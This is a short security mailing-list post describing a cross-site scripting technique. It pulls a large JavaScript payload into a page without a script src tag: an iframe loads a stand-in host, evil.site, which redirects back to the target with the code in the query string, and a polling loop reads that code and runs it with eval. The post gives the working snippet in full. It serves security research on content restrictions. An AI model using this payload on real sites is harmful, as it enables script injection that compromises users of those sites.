Importing large code piece into Javascript context without SCRIPT SRC=...

["Amit Klein (AKsecurity)" <aksecurity () hotpop com>]

Hi

Recently, I've been toying with the somewhat academic question of whether it is possible to 
"import" a large piece of JS code (to be used as XSS payload), given that a script context 
is already available, BUT without using SCRIPT SRC=...
This question is triggered by the "script" keyword of Gervase Markham's Content- 
Restrictions suggestion (http://www.gerv.net/security/content-restrictions/).

I came up with a nice idea, which is abusing any manner of loading HTML content (such as 
IFRAME, new windows, etc.) as following:
The attacker forces a load from its own website (evil.site), which redirects the browser 
back to the original website (say target.site). It needs to do so with a query (e.g. 
"?data=..."). This query is the channel through which the JS payload is transmitted to the 
malicious bridge-head. In the below example, assume that evil.site/redir.cgi simply 
redirects to target.site/index.html?data=...
Note that it may take few seconds for the target.site page to load, and meanwhile, the 
script (which runs in the target.site domain) cannot access the IFRAME (which initially is 
in evil.site domain). Hence the need for the loop.

<iframe src="http://evil.site/redir.cgi"; width=1 height=1></iframe>
<script>
var tid;
function fetch() 
{
      try
      {
            var data=document.frames[0].location.search.substr(6);
            clearInterval(tid);
            eval(data);
      }
      catch(ex)
      {
      }
}
tid = setInterval('fetch()', 100);
</script>

As you can see, with about 240 bytes, I can force a load of any script code through the 
query part, which can host 4KB. And it's easy to do this multiple times.

-Amit